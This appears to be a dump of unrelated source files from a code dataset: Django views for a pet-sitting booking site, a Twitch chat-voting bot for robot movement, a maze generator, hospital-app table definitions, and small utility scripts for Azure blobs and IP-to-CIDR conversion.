Q(allowed_to_show=True)&\n Q(date_start__lte=start_date)&\n Q(date_end__gte=end_date)&\n Q(price__range=[price_start, price_end])&\n Q(dogs_allowed=True)&\n Q(review_score__gte=review_score))\n elif pet_type == \"Cat\":\n services = SitterServices.objects.filter(Q(type__in=type)&\n Q(allowed_to_show=True)&\n Q(date_start__lte=start_date)&\n Q(date_end__gte=end_date)&\n Q(price__range=[price_start, price_end])&\n Q(cats_allowed=True)&\n Q(review_score__gte=review_score))\n elif pet_type == \"Bird\":\n services = SitterServices.objects.filter(Q(type__in=type)&\n Q(allowed_to_show=True)&\n Q(date_start__lte=start_date)&\n Q(date_end__gte=end_date)&\n Q(price__range=[price_start, price_end])&\n Q(birds_allowed=True)&\n Q(review_score__gte=review_score))\n elif pet_type == \"Reptile\":\n services = SitterServices.objects.filter(Q(type__in=type)&\n Q(allowed_to_show=True)&\n Q(date_start__lte=start_date)&\n Q(date_end__gte=end_date)&\n Q(price__range=[price_start, price_end])&\n Q(reptiles_allowed=True)&\n Q(review_score__gte=review_score))\n elif pet_type == \"Other\":\n services = SitterServices.objects.filter(Q(type__in=type)&\n Q(allowed_to_show=True)&\n Q(date_start__lte=start_date)&\n Q(date_end__gte=end_date)&\n Q(price__range=[price_start, price_end])&\n Q(other_pets_allowed=True)&\n Q(review_score__gte=review_score))\n\n\n if len(services) < 1:\n services = SitterServices.objects.filter(Q(allowed_to_show=True))\n\n #filter on location\n try:\n location_input = request.GET['location_input']\n services,locations = filter_on_location(services, location_input)\n reviews = [generate_review_html_start(service.review_score) for service in services]\n number_of_reviews = [service.number_of_reviews for service in services]\n except:\n location_input = \"Location\"\n ids = [service.id for service in services]\n locations = ServiceLocation.objects.filter(id__in=ids)\n reviews = [generate_review_html_start(service.review_score) for service in services]\n number_of_reviews = [service.number_of_reviews for service in services]\n\n # if not location_input:\n # location_input = \"Location\"\n\n services = zip(services, locations, reviews, number_of_reviews)\n try:\n if request.user.is_sitter:\n context = {\n \"title\": \"View pet services\",\n \"type\":\"Services\",\n \"sitter_user\":True,\n \"services\":services,\n \"location_input\":location_input,\n \"google_api\":str(settings.GOOGLE_API_KEY),\n\n }\n else:\n context = {\n \"title\": \"View pet services\",\n \"type\":\"Services\",\n \"sitter_user\":False,\n \"services\":services,\n \"location_input\":location_input,\n \"google_api\":str(settings.GOOGLE_API_KEY),\n }\n except:\n context = {\n \"title\": \"View pet services\",\n \"type\":\"Services\",\n \"sitter_user\":False,\n \"services\":services,\n \"location_input\":location_input,\n \"google_api\":str(settings.GOOGLE_API_KEY),\n }\n\n\n return render(request, 'services/single-type-services.html', context)\n\n\ndef view_single_service(request, service_id):\n\n # get all services with type requested\n type_dictionary = {\"WALK\":\"Walking Service\",\n 'BOARD':\"Boarding Service\",\n 'SIT' :'Sitting Service',\n 'DAYCARE' :'Daycare Service'}\n\n service = SitterServices.objects.get(id=service_id)\n reviews = ServiceReviews.objects.filter(service=service)\n reviews_paginator = Paginator(reviews, 5)\n\n # check if service should be updated (only every 5 hours)\n now = datetime.now(timezone.utc)\n difference = now - service.updated_at\n total_hours = difference.days*24\n try:\n if total_hours>5:\n number_of_reviews = ServiceReviews.objects.filter(service=service).count()\n service.number_of_reviews = number_of_reviews\n service.review_score = ServiceReviews.objects.filter(service=service).aggregate(Sum('review_score'))['review_score__sum']/number_of_reviews\n service.save(update_fields=[\"number_of_reviews\", \"review_score\"])\n except:\n print(\"couldnt update\")\n\n\n # check if sitter should be updated (only every 5 hours)\n now = datetime.now(timezone.utc)\n difference = now - service.sitter.updated_at\n total_hours = difference.days*24\n try:\n if total_hours>5:\n sitter = MiiSitter.objects.get(user=service.sitter)\n number_of_services = SitterServices.objects.filter(sitter=service.sitter).count()\n sitter_review_score = SitterServices.objects.filter(sitter=service.sitter).aggregate(Sum('review_score'))['review_score__sum']/number_of_services\n number_of_bookings = ServiceBooking.objects.filter(service=service).count()\n\n sitter.review_score = sitter_review_score\n sitter.number_of_bookings = number_of_bookings\n sitter.save(update_fields=[\"review_score\", \"number_of_bookings\"])\n except:\n print(\"couldnt update sitter\")\n\n similar_services = SitterServices.objects.filter(\n Q(type=service.type) &\n Q(allowed_to_show=True)&\n (Q(price__lte=service.price*1.2) & Q(price__gte=service.price*0.8)) &\n ~Q(id = service.id))\n\n photos = ServicePhotos.objects.filter(service=service)\n location = ServiceLocation.objects.get(service=service)\n sitter = User.objects.get(id=service.sitter.id)\n miisitter = MiiSitter.objects.get(user=sitter)\n\n\n time_converter = {'9999':\"Not availibe\",\n '1':\"01:00\",\n '2':\"02:00\",\n \"3\":\"03:00\",\n \"4\":\"04:00\",\n \"5\":\"05:00\",\n \"7\":\"06:00\",\n \"6\":\"07:00\",\n \"8\":\"08:00\",\n \"9\":\"09:00\",\n \"10\":\"10:00\",\n \"11\":\"11:00\",\n \"12\":\"12:00\",\n \"13\":\"13:00\",\n \"14\":\"14:00\",\n \"15\":\"15:00\",\n \"16\":\"16:00\",\n \"17\":\"17:00\",\n \"18\":\"18:00\",\n \"19\":\"19:00\",\n \"20\":\"20:00\",\n \"21\":\"21:00\",\n \"22\":\"22:00\",\n \"23\":\"23:00\",\n \"0\":\"00:00\"}\n\n if request.method == 'POST':\n form = BookService(request.POST, user = request.user, service = service)\n if form.is_valid():\n booking = form.save()\n return redirect('services-booking-confirmation', service_id = service.id, booking_id = booking.id)\n else:\n form = BookService(user = request.user, service = service)\n\n\n page = request.GET.get('page', 1)\n try:\n reviews = reviews_paginator.page(page)\n except PageNotAnInteger:\n reviews = reviews_paginator.page(1)\n except EmptyPage:\n reviews = reviews_paginator.page(paginator.num_pages)\n\n try:\n if request.user.is_sitter:\n context = {\n \"title\": \"Single pet service\",\n \"sitter\":sitter,\n \"miisitter\":miisitter,\n \"reviews\":reviews,\n \"similar_services\":similar_services,\n \"sitter_user\":True,\n \"review_html\":generate_review_html_start(service.review_score),\n 'type':type_dictionary[service.type],\n \"service_name\":service.service_name,\n \"service_description\":service.description,\n 'price':service.price,\n 'photos':photos,\n 'service':service,\n 'location':location.city+\", \"+location.province,\n 'monday_start_time':time_converter[str(service.time_start_monday)],\n 'tuesday_start_time':time_converter[str(service.time_start_tuesday)],\n 'wednesday_start_time':time_converter[str(service.time_start_wednesday)],\n 'thursday_start_time':time_converter[str(service.time_start_thursday)],\n 'friday_start_time':time_converter[str(service.time_start_friday)],\n 'saturday_start_time':time_converter[str(service.time_start_saturday)],\n 'sunday_start_time':time_converter[str(service.time_start_sunday)],\n 'monday_end_time':time_converter[str(service.time_end_monday)],\n 'tuesday_end_time':time_converter[str(service.time_end_tuesday)],\n 'wednesday_end_time':time_converter[str(service.time_end_wednesday)],\n 'thursday_end_time':time_converter[str(service.time_end_thursday)],\n 'friday_end_time':time_converter[str(service.time_end_friday)],\n 'saturday_end_time':time_converter[str(service.time_end_saturday)],\n 'sunday_end_time':time_converter[str(service.time_end_sunday)],\n 'form':form\n }\n else:\n context = {\n \"title\": \"Single pet service\",\n \"sitter\":sitter,\n \"similar_services\":similar_services,\n \"miisitter\":miisitter,\n \"reviews\":reviews,\n \"sitter_user\":False,\n 'type':type_dictionary[service.type],\n \"review_html\":generate_review_html_start(service.review_score),\n \"service_name\":service.service_name,\n \"service_description\":service.description,\n 'price':service.price,\n 'photos':photos,\n 'service':service,\n 'location':location.city+\", \"+location.province,\n 'monday_start_time':time_converter[str(service.time_start_monday)],\n 'tuesday_start_time':time_converter[str(service.time_start_tuesday)],\n 'wednesday_start_time':time_converter[str(service.time_start_wednesday)],\n 'thursday_start_time':time_converter[str(service.time_start_thursday)],\n 'friday_start_time':time_converter[str(service.time_start_friday)],\n 'saturday_start_time':time_converter[str(service.time_start_saturday)],\n 'sunday_start_time':time_converter[str(service.time_start_sunday)],\n 'monday_end_time':time_converter[str(service.time_end_monday)],\n 'tuesday_end_time':time_converter[str(service.time_end_tuesday)],\n 'wednesday_end_time':time_converter[str(service.time_end_wednesday)],\n 'thursday_end_time':time_converter[str(service.time_end_thursday)],\n 'friday_end_time':time_converter[str(service.time_end_friday)],\n 'saturday_end_time':time_converter[str(service.time_end_saturday)],\n 'sunday_end_time':time_converter[str(service.time_end_sunday)],\n 'form':form\n }\n except:\n context = {\n \"title\": \"Single pet service\",\n \"sitter\":sitter,\n \"similar_services\":similar_services,\n \"miisitter\":miisitter,\n \"reviews\":reviews,\n \"sitter_user\":False,\n 'type':type_dictionary[service.type],\n \"review_html\":generate_review_html_start(service.review_score),\n \"service_name\":service.service_name,\n \"service_description\":service.description,\n 'price':service.price,\n 'photos':photos,\n 'service':service,\n 'location':location.city+\", \"+location.province,\n 'monday_start_time':time_converter[str(service.time_start_monday)],\n 'tuesday_start_time':time_converter[str(service.time_start_tuesday)],\n 'wednesday_start_time':time_converter[str(service.time_start_wednesday)],\n 'thursday_start_time':time_converter[str(service.time_start_thursday)],\n 'friday_start_time':time_converter[str(service.time_start_friday)],\n 'saturday_start_time':time_converter[str(service.time_start_saturday)],\n 'sunday_start_time':time_converter[str(service.time_start_sunday)],\n 'monday_end_time':time_converter[str(service.time_end_monday)],\n 'tuesday_end_time':time_converter[str(service.time_end_tuesday)],\n 'wednesday_end_time':time_converter[str(service.time_end_wednesday)],\n 'thursday_end_time':time_converter[str(service.time_end_thursday)],\n 'friday_end_time':time_converter[str(service.time_end_friday)],\n 'saturday_end_time':time_converter[str(service.time_end_saturday)],\n 'sunday_end_time':time_converter[str(service.time_end_sunday)],\n 'form':form\n }\n\n return render(request, 'services/single-service.html', context)\n\n\ndef load_timeslots(request, service_id):\n date = request.GET.get('date')\n service = SitterServices.objects.get(id=service_id)\n day_of_week = return_day_of_week_from_date(date)\n\n if day_of_week == \"Monday\":\n time_start = service.time_start_monday\n time_end = service.time_end_monday\n elif day_of_week == \"Tuesday\":\n time_start = service.time_start_tuesday\n time_end = service.time_end_tuesday\n elif day_of_week == \"Wednesday\":\n time_start = service.time_start_wednesday\n time_end = service.time_end_wednesday\n elif day_of_week == \"Thursday\":\n time_start = service.time_start_thursday\n time_end = service.time_end_thursday\n elif day_of_week == \"Friday\":\n time_start = service.time_start_friday\n time_end = service.time_end_friday\n elif day_of_week == \"Saturday\":\n time_start = service.time_start_saturday\n time_end = service.time_end_saturday\n elif day_of_week == \"Sunday\":\n time_start = service.time_start_sunday\n time_end = service.time_end_sunday\n\n if time_start == 9999:\n return render(request,\n 'services/time_slots_options.html',\n {'timeslots': [[9999, \"Not availibe on {}\".format(day_of_week)]]})\n\n\n bookings = ServiceBooking.objects.filter(Q(service=service) &\n Q(start_date = date)).values_list('time_slot',\n 'number_of_pets')\n bookings = list(set(bookings))\n\n #get time_slots\n taken_slots = [x[0] for x in bookings]\n number_of_pets = [x[1] for x in bookings]\n\n list_of_options = get_options_of_timeslots_walk_sit(taken_slots,\n time_start,\n time_end)\n\n return render(request, 'services/time_slots_options.html', {'timeslots': list_of_options})\n\n\ndef send_sitter_confirmation_email(service, booking, user, email_address):\n \"\"\"\n Send email to sitter after owner makes a booking\n \"\"\"\n\n time_to_interval_converter = {\n 9999:\"Whole day\",\n 1:\"01:00-02:00\",\n 2:\"02:00-02:00\",\n 3:\"03:00-04:00\",\n 4:\"04:00-05:00\",\n 5:\"05:00-06:00\",\n 6:\"06:00-07:00\",\n 7:\"07:00-08:00\",\n 8:\"08:00-09:00\",\n 9:\"09:00-10:00\",\n 10:\"10:00-11:00\",\n 11:\"11:00-12:00\",\n 12:\"12:00-13:00\",\n 13:\"13:00-14:00\",\n 14:\"14:00-15:00\",\n 15:\"15:00-16:00\",\n 16:\"16:00-17:00\",\n 17:\"17:00-18:00\",\n 18:\"18:00-19:00\",\n 19:\"19:00-20:00\",\n 20:\"20:00-21:00\",\n 21:\"21:00-22:00\",\n 22:\"22:00-23:00\",\n 23:\"23:00-00:00\"\n }\n\n #creating context data\n timeslot = time_to_interval_converter[booking.time_slot]\n\n context = {\n \"service\":service,\n \"booking\":booking,\n \"owner\":user,\n \"timeslot\":timeslot\n }\n\n subject = 'You have a booking with MiiPets!'\n html_message = render_to_string('services/notify_sitter_booking_email.html',\n context)\n plain_message = strip_tags(html_message)\n from_email = 'info@miipets.com'\n to = email_address\n try:\n mail.send_mail(subject, plain_message, from_email, [to], html_message=html_message)\n except mail.BadHeaderError:\n return HttpResponse('Invalid header found.')\n\n\ndef send_owner_confirmation_email(service, booking, sitter_answer):\n \"\"\"\n Send email to owner after sitter confirms\n \"\"\"\n\n time_to_interval_converter = {\n 9999:\"Whole day\",\n 1:\"01:00-02:00\",\n 2:\"02:00-02:00\",\n 3:\"03:00-04:00\",\n 4:\"04:00-05:00\",\n 5:\"05:00-06:00\",\n 6:\"06:00-07:00\",\n 7:\"07:00-08:00\",\n 8:\"08:00-09:00\",\n 9:\"09:00-10:00\",\n 10:\"10:00-11:00\",\n 11:\"11:00-12:00\",\n 12:\"12:00-13:00\",\n 13:\"13:00-14:00\",\n 14:\"14:00-15:00\",\n 15:\"15:00-16:00\",\n 16:\"16:00-17:00\",\n 17:\"17:00-18:00\",\n 18:\"18:00-19:00\",\n 19:\"19:00-20:00\",\n 20:\"20:00-21:00\",\n 21:\"21:00-22:00\",\n 22:\"22:00-23:00\",\n 23:\"23:00-00:00\"\n }\n\n #creating context data\n timeslot = time_to_interval_converter[booking.time_slot]\n\n context = {\n \"service\":service,\n \"booking\":booking,\n \"owner\":booking.requester,\n \"timeslot\":timeslot\n }\n\n if booking.sitter_answer:\n subject = 'Your MiiSitter has accepted your booking!'\n else:\n subject = 'Your MiiSitter has responded to your booking'\n\n html_message = render_to_string('services/notify_owner_booking_email.html',\n context)\n plain_message = strip_tags(html_message)\n from_email = 'info@miipets.com'\n to = booking.requester.email\n try:\n mail.send_mail(subject, plain_message, from_email, [to], html_message=html_message)\n except mail.BadHeaderError:\n return HttpResponse('Invalid header found.')\n\n\n@login_required(login_url='core-login')\ndef booking_confirmation(request, service_id, booking_id):\n\n\n booking = ServiceBooking.objects.get(id=booking_id)\n service = SitterServices.objects.get(id=service_id)\n\n # send email to sitter\n if booking.notified_sitter == False:\n try:\n send_sitter_confirmation_email(service, booking, request.user, service.sitter.email)\n print(\"SITTER NOTIFIED\")\n booking.notified_sitter = True\n booking.save(update_fields=['notified_sitter'])\n except:\n print(\"Sitter notification email did not work\")\n\n return render(request, 'services/booking_confirmation.html', {\"user\":request.user})\n\n\n@login_required(login_url='core-login')\ndef sitter_confirmation(request, service_id, booking_id, sitter_answer):\n\n booking = ServiceBooking.objects.get(id=booking_id)\n service = SitterServices.objects.get(id=service_id)\n\n sitter_answer_converter = {\n 0:False,\n 1:True\n }\n\n if booking.sitter_confirmed:\n # sitter has already answered and can not change now\n pass\n else:\n booking.sitter_confirmed = True\n booking.sitter_answer = sitter_answer_converter[sitter_answer]\n\n #send owner email notifying of sitter answer\n try:\n send_owner_confirmation_email(service,\n booking,\n sitter_answer)\n booking.notified_owner_of_sitter_response = True\n except:\n print(\"Could not send email to owner\")\n\n #update booking details\n booking.save(update_fields=['sitter_confirmed',\n 'sitter_answer',\n 'notified_owner_of_sitter_response'])\n\n return render(request, 'services/booking_confirmation_sitter.html', {\"user\":request.user, \"sitter_answer\":sitter_answer})\n\n@login_required(login_url='core-login')\n@agreed_terms_required\ndef view_sitter_profile(request, sitter_id):\n \"\"\"\n When a someone clicks on the service sitter\n link they will be taken to this profile page\n where there is no option to edit profile\n \"\"\"\n sitter = User.objects.get(id=sitter_id)\n miisitter = MiiSitter.objects.get(user=sitter)\n services = SitterServices.objects.filter(sitter=sitter)\n\n try:\n if request.user.is_sitter:\n context = {\n \"services\":services,\n \"sitter\":sitter,\n \"sitter_user\":True,\n \"review_html\":generate_review_html_start(miisitter.review_score),\n \"review_score\":miisitter.review_score,\n }\n else:\n context = {\n \"services\":services,\n \"sitter\":sitter,\n \"sitter_user\":False,\n \"review_html\":generate_review_html_start(miisitter.review_score),\n \"review_score\":miisitter.review_score,\n }\n except:\n context = {\n \"services\":services,\n \"sitter\":sitter,\n \"sitter_user\":False,\n \"review_html\":generate_review_html_start(miisitter.review_score),\n \"review_score\":miisitter.review_score,\n }\n\n return render(request, 'services/view_sitter_profile.html', context)\n\n@login_required(login_url='core-login')\n@agreed_terms_required\ndef view_owner_profile(request, owner_id):\n \"\"\"\n When a someone clicks on the owner\n link they will be taken to this profile page\n where there is no option to edit profile\n \"\"\"\n owner = User.objects.get(id=owner_id)\n pets = Pets.objects.filter(owner=owner)\n\n try:\n if request.user.is_sitter:\n context = {\n \"pets\":pets,\n \"owner\":owner,\n \"sitter_user\":True,\n }\n else:\n context = {\n \"pets\":pets,\n \"owner\":owner,\n \"sitter_user\":False,\n }\n except:\n context = {\n \"pets\":pets,\n \"owner\":owner,\n \"sitter_user\":False,\n }\n\n return render(request, 'services/view_owner_profile.html', context)\n\n\n@login_required(login_url='core-login')\n@agreed_terms_required\ndef owner_payment(request, service_id, booking_id):\n\n booking = ServiceBooking.objects.get(id=booking_id)\n service = SitterServices.objects.get(id=service_id)\n\n return render(request, 'services/payment_owner.html', {\"user\":request.user})\n","repo_name":"MiiPets/webapp","sub_path":"MiipetsWebApp/services/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":28748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7581360128","text":"import os\n\nimport pandas as pd\nfrom dotenv import load_dotenv\nfrom azure.storage.blob import BlobServiceClient\nimport requests\n\nload_dotenv()\n\nblob_service_client = BlobServiceClient.from_connection_string(\n os.getenv(\"AZURE_STORAGE_CONNECTION_STRING\")\n)\n\ncontainer_name = os.environ[\"CONTAINER_NAME\"]\n\n\nbatch = 500\n\n\ndef main():\n for d in pd.date_range(\"2020-09-01\", \"2020-11-30\", freq=\"D\"):\n for blob in blob_service_client.get_container_client(container_name).list_blobs(\n name_starts_with=f\"profiles/{d.strftime('%Y-%m-%d')}\"\n ):\n print(f\"sending {blob.name}\")\n res = requests.post(\n f\"http://localhost:3030/queue/newstory.tasks.newEntry\",\n json={\"message\": blob.name},\n )\n res.raise_for_status()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"eylonronen/newstory-scraper","sub_path":"scripts/send_to_service.py","file_name":"send_to_service.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16734217008","text":"import logging\nimport threading\nimport time\n\nimport irc.bot\n\nfrom constants import MOVEMENT_BACKWARD, MOVEMENT_FORWARD, MOVEMENT_SIT, MOVEMENT_STAND, MOVEMENT_STRAFE_LEFT, \\\n MOVEMENT_STRAFE_RIGHT, MOVEMENT_TURN_LEFT, MOVEMENT_TURN_RIGHT\n\n\nclass TwitchBot(irc.bot.SingleServerIRCBot):\n def __init__(self, username, client_id, token, channel, movement_callback):\n self.__client_id = client_id\n self.__token = token\n self.__channel = '#' + channel\n self.__chat_buffer = {}\n self.__chat_count = 0\n\n self.__movement_callback = movement_callback\n\n server = 'irc.chat.twitch.tv'\n port = 6667\n logging.info(f'Connecting to twitch-server {server} on port {port}...')\n irc.bot.SingleServerIRCBot.__init__(\n self, [(server, port, str(token))], username, username)\n\n def on_welcome(self, c, e):\n logging.info(f'Joining {self.__channel}')\n\n threading.Thread(target=self.__chat_analyzer).start()\n\n c.cap('REQ', ':twitch.tv/membership')\n c.cap('REQ', ':twitch.tv/tags')\n c.cap('REQ', ':twitch.tv/commands')\n c.join(self.__channel)\n\n def get_chat_count(self):\n return self.__chat_count\n\n def on_pubmsg(self, c, e):\n if e.arguments[0][:1] == '!':\n cmd = e.arguments[0].split(' ')[0][1:]\n self.do_command(e, cmd)\n return\n\n def do_command(self, event, cmd):\n moves = [MOVEMENT_BACKWARD, MOVEMENT_FORWARD, MOVEMENT_SIT, MOVEMENT_STAND,\n MOVEMENT_STRAFE_LEFT, MOVEMENT_STRAFE_RIGHT, MOVEMENT_TURN_LEFT, MOVEMENT_TURN_RIGHT]\n if cmd == \"help\":\n self.connection.privmsg(event.target, ' '.join(\n [str(elem) for elem in map((lambda move: f\"!{move}\"), moves)]))\n\n if cmd in moves:\n self.__chat_buffer[event.source.nick] = cmd\n\n def __chat_analyzer(self):\n while True:\n time.sleep(1)\n\n chat_buffer = self.__chat_buffer\n self.__chat_count = len(self.__chat_buffer.keys()) if len(\n self.__chat_buffer.keys()) > 0 else self.__chat_count\n self.__chat_buffer = {}\n\n count_dict = {\n MOVEMENT_SIT: 0,\n MOVEMENT_STAND: 0,\n MOVEMENT_STRAFE_LEFT: 0,\n MOVEMENT_STRAFE_RIGHT: 0,\n MOVEMENT_TURN_LEFT: 0,\n MOVEMENT_TURN_RIGHT: 0,\n MOVEMENT_BACKWARD: 0,\n MOVEMENT_FORWARD: 0\n }\n\n for value in chat_buffer.values():\n if value == MOVEMENT_SIT:\n count_dict[MOVEMENT_SIT] += 1\n elif value == MOVEMENT_STAND:\n count_dict[MOVEMENT_STAND] += 1\n elif value == MOVEMENT_STRAFE_LEFT:\n count_dict[MOVEMENT_STRAFE_LEFT] += 1\n elif value == MOVEMENT_STRAFE_RIGHT:\n count_dict[MOVEMENT_STRAFE_RIGHT] += 1\n elif value == MOVEMENT_TURN_LEFT:\n count_dict[MOVEMENT_TURN_LEFT] += 1\n elif value == MOVEMENT_TURN_RIGHT:\n count_dict[MOVEMENT_TURN_RIGHT] += 1\n elif value == MOVEMENT_BACKWARD:\n count_dict[MOVEMENT_BACKWARD] += 1\n elif value == MOVEMENT_FORWARD:\n count_dict[MOVEMENT_FORWARD] += 1\n\n top_result = sorted(\n count_dict, key=count_dict.get, reverse=True)[0]\n\n if count_dict[top_result] > 0:\n logging.info(f\"command '{top_result}' won with {count_dict[top_result]} votes\")\n self.__movement_callback(top_result)\n","repo_name":"monstrey-technologies/twitch-plays-spot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21568179286","text":"import random\nfrom linkedlist import cons\nfrom linkedlist import empty_list\n\n\nclass Maze:\n def __init__(self, w, h, paths):\n self.maze = [\n [0 for x in range(0, w)] for y in range(0, h)]\n for ((i, j), (i_, j_)) in paths:\n if j == j_: # Horizontal path\n self.maze[j][i] |= 1 # Right\n self.maze[j_][i_] |= 4 # Left\n elif i == i_: # Vertical path\n self.maze[j][i] |= 2 # Down\n self.maze[j_][i_] |= 8 # Up\n self.w = w\n self.h = h\n\n def get_walls(self, coord):\n (i, j) = coord\n return self.maze[j][i]\n\n def reachable(self, coord):\n (i, j) = coord\n reachable = list()\n if self.get_walls(coord) & 1 == 1: # Right is reachable\n reachable.append((i + 1, j))\n if self.get_walls(coord) & 2 == 2: # Down is reachable\n reachable.append((i, j + 1))\n if self.get_walls(coord) & 4 == 4: # Left is reachable\n reachable.append((i - 1, j))\n if self.get_walls(coord) & 8 == 8: # Up is reachable\n reachable.append((i, j - 1))\n return reachable\n\n def as_string(self):\n maze, w, h = self.maze, self.w, self.h\n lines = [\"#\" * (2 * w + 1)]\n for i in range(0, h):\n # Horizontal paths\n upper = \"#\" + \"\".join([\" \" if maze[i][j] & 1 == 1 else \" #\" for j in range(0, w)])\n # Vertical paths\n lower = \"#\" + \"\".join([\" #\" if maze[i][j] & 2 == 2 else \"##\" for j in range(0, w)])\n lines.append(upper)\n lines.append(lower)\n\n return \"\\n\".join(lines)\n\n def __repr__(self):\n return self.as_string()\n\n @staticmethod\n def generate(w, h):\n candidates = [(n % w, n // h) for n in range(0, w * h)]\n c_groups, g_cells, paths = dict(), dict(), list()\n\n # Group all cells. Keep both cell -> group and group -> cells in memory\n for (i, j) in candidates:\n c_groups[(i, j)] = j * h + i\n g_cells[j * h + i] = {(i, j)}\n\n while len(g_cells) > 1:\n index = random.randint(0, len(candidates) - 1)\n (i, j) = c = candidates[index]\n group = c_groups[(i, j)]\n # list possible path from cell (i, j)\n choices = list()\n if i - 1 >= 0 and c_groups[(i - 1, j)] != group:\n choices.append((i - 1, j))\n if i + 1 < w and c_groups[(i + 1, j)] != group:\n choices.append((i + 1, j))\n if j - 1 >= 0 and c_groups[(i, j - 1)] != group:\n choices.append((i, j - 1))\n if j + 1 < h and c_groups[(i, j + 1)] != group:\n choices.append((i, j + 1))\n\n if len(choices) == 0:\n candidates.pop(index)\n continue\n\n c_ = random.choice(choices)\n\n # remember chosen path and merge groups\n if c > c_:\n paths.append((c_, c))\n else:\n paths.append((c, c_))\n old_group = c_groups[c_]\n for cell in g_cells[old_group]:\n c_groups[cell] = group\n g_cells[group].update(g_cells[old_group])\n g_cells.pop(old_group)\n\n return Maze(w, h, paths)\n\n\nclass Solver:\n @staticmethod\n def solve(maze, start, end):\n print(maze)\n paths = [cons(start, empty_list())]\n while True:\n current = paths.pop(0)\n visited = None\n if current.has_tail:\n visited = current.tail.head\n\n reachable = maze.reachable(current.head)\n if reachable:\n for step in maze.reachable(current.head):\n if step == end:\n res = cons(step, current).to_list()\n res.reverse()\n return res\n if step == visited:\n continue\n paths.append(cons(step, current))\n","repo_name":"gunsten/py-maze","sub_path":"maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20513139702","text":"import django_tables2 as tables\nfrom django_tables2.utils import A\nfrom .models import (\n Doctor,\n Appointment,\n Patient,\n Illness,\n Staff,\n RoomAssignment,\n HospitalRoom,\n StaffShift\n)\n\n\nclass DoctorTable(tables.Table):\n view = tables.LinkColumn(\n 'doctor',\n orderable=False, text='View Schedule', args=[A('pk')]\n )\n\n class Meta:\n model = Doctor\n template = 'django_tables2/bootstrap.html'\n attr = {'class': 'table'}\n fields = (\n 'view',\n 'first_name',\n 'last_name',\n 'specialization',\n )\n\n\nclass StaffTable(tables.Table):\n\n view = tables.LinkColumn(\n 'staff_details',\n orderable=False,\n text='View Staff Info',\n args=[A('pk')]\n )\n remove = tables.LinkColumn(\n 'staff_member_remove',\n orderable=False,\n text='Remove Staff Member',\n args=[A('pk')]\n )\n\n class Meta:\n model = Staff\n template = 'django_tables2/bootstrap.html'\n attr = {'class': 'table'}\n fields = (\n 'view',\n 'first_name',\n 'last_name',\n 'occupation',\n 'social_security_number',\n 'remove'\n )\n\n\nclass AppointmentTable(tables.Table):\n action = tables.LinkColumn(\n 'appointment_delete',\n orderable=False,\n text='cancel',\n args=[A('pk')]\n )\n\n class Meta:\n model = Appointment\n template = 'django_tables2/bootstrap.html'\n attr = {'class': 'table table-striped'}\n fields = (\n 'date',\n 'start_time',\n 'end_time',\n 'patient',\n 'doctor',\n 'action',\n )\n\n\nclass PatientAppointmentTable(tables.Table):\n\n action = tables.LinkColumn('appointment_delete', orderable=False, text='cancel', args=[A('pk')])\n\n class Meta:\n model = Appointment\n template = 'django_tables2/bootstrap.html'\n attr = {'class': 'table table-striped'}\n fields = (\n 'date',\n 'start_time',\n 'end_time',\n 'doctor',\n 'action'\n )\n\n\nclass PatientTable(tables.Table):\n view = tables.LinkColumn('patient', orderable=False, text='View Patient Info', args=[A('pk')])\n\n class Meta:\n model = Patient\n template = 'django_tables2/bootstrap.html'\n attr = {'class': 'table'}\n fields = (\n 'view',\n 'first_name',\n 'last_name',\n 'social_security_number'\n )\n\n\nclass IllnessTable(tables.Table):\n\n update = tables.LinkColumn('patient_illness_update', orderable=False, text='Mark Resolved', args=[A('pk')])\n\n class Meta:\n model = Illness\n template = 'django_tables2/bootstrap.html'\n attr = {'class': 'table'}\n fields = (\n 'doctor',\n 'illness',\n 'prescribed_medication',\n 'date_diagnosed',\n 'resolution',\n 'update'\n )\n\n\nclass HospitalRoomTable(tables.Table):\n\n action = tables.LinkColumn('mark_room_vacant', text='Mark Vacant', orderable=False, args=[A('pk')])\n\n class Meta:\n model = RoomAssignment\n template = 'django_tables2/bootstrap.html'\n attr = {'class': 'table'}\n fields = (\n 'patient',\n 'room',\n 'doctor',\n 'nurse'\n )\n\n\nclass HospitalRoomsTable(tables.Table):\n\n class Meta:\n model = HospitalRoom\n template = 'django_tables2/bootstrap.html'\n attr = {'class': 'table'}\n fields = (\n 'room_number',\n 'department',\n 'is_vacant'\n )\n\n\nclass StaffScheduleTable(tables.Table):\n action = tables.LinkColumn(\n 'staff_delete_shift', text='cancel shift', orderable=False, args=[A('pk')]\n )\n class Meta:\n model = StaffShift\n template = 'django_tables2/bootstrap.html'\n attr = {'class': 'table'}\n fields = (\n 'staff_member',\n 'staff_member.occupation',\n 'staff_member.specialization',\n 'date',\n 'start_time',\n 'end_time'\n )\n\n\n\n\n\n","repo_name":"johnhoman/hospital_db_django_project","sub_path":"management/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":4247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7352263658","text":"# script to convert IP ranges to CIDR notation\n# version 1.0\n# Author Bert de Jong\nimport ipaddress\nimport csv\n\n# Read the csv file, set the delimiter and assign the values of the row to\n# startip and endip. writes the result to a file. Includes dirty error handling\n# to stdout.\nfile = input('Please input a filename: \\n')\ndelim = input('Please enter the delimiter used in the csv file: \\n')\n\nwith open(file, 'r') as csvfile, open('parse_ips.txt', 'w') as parsed:\n counter = 0\n errorcount = 0\n range = csv.reader(csvfile, delimiter=delim)\n for row in range:\n try:\n ip1 = row[0]\n startip = ipaddress.IPv4Address(ip1)\n ip2 = row[1]\n endip = ipaddress.IPv4Address(ip2)\n cidr = [ipaddr for ipaddr in\n ipaddress.summarize_address_range(startip, endip)]\n for network in cidr:\n parsed.write(str(network))\n parsed.write('\\n')\n counter += 1\n except ValueError:\n print('There was an error with this row:', row)\n errorcount += 1\n 